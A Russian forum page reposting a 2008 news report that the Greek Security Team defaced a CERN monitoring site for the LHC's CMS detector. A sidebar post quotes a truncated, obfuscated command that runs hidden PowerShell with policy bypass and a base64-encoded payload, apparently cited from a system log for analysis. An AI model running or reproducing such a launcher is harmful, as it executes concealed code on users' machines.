Перейти к содержанию
radioelectron

Хакеры атаковали Большой адронный коллайдер

Recommended Posts

radioelectron

Группа хакеров взломала компьютерную систему CERN (Европейский центр ядерных исследований), организации, курирующей проект Большой адронный коллайдер (БАК). Об этом сообщает The Daily Telegraph. Впрочем, серьезного вреда проекту хакеры не нанесли.

На сайте cmsmon.cern.ch хакерами была размещен текст на греческом языке, озаглавленный «GST: Greek Security Team». Кроме того, хакеры повредили один из файлов CERN. Сейчас сайт cmsmon.cern.ch недоступен.

Система CMSMON, доступ к которой пытались получить хакеры, контролирует работу компактного мюонного соленоида (Compact Muon Solenoid, CMS), созданного, чтобы отслеживать данные в ходе столкновения элементарных частиц в ускорителе БАК.

Газета отмечает, что ученые в CERN были обеспокоены атакой хакеров, поскольку те были в «одном шаге» от компьютерной системы, которая контролирует CMS. Источники издания сообщили, что если бы хакеры взломали компьютерную сеть второго уровня, то смогли бы частично отключить CMS.

Впрочем, источники The Times в CERN утверждают, что хакеры могли добраться до CMSMON из-за многоступенчатой системы безопасности сети организации.

В CERN полагают, что хакеры лишь хотели показать уязвимость компьютерных систем лаборатории.

Стоит отметить, что взлом сети CERN произошел в среду, 10 сентября, когда первый пучок протонов был запущен по туннелю ускорителя БАК длиной 27 километров.

Источник: http://lenta.ru/news/2008/09/13/cern/

Скриншот с The Daily Telegraph:

scicern212_big.gif

post-3845-1221322076_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×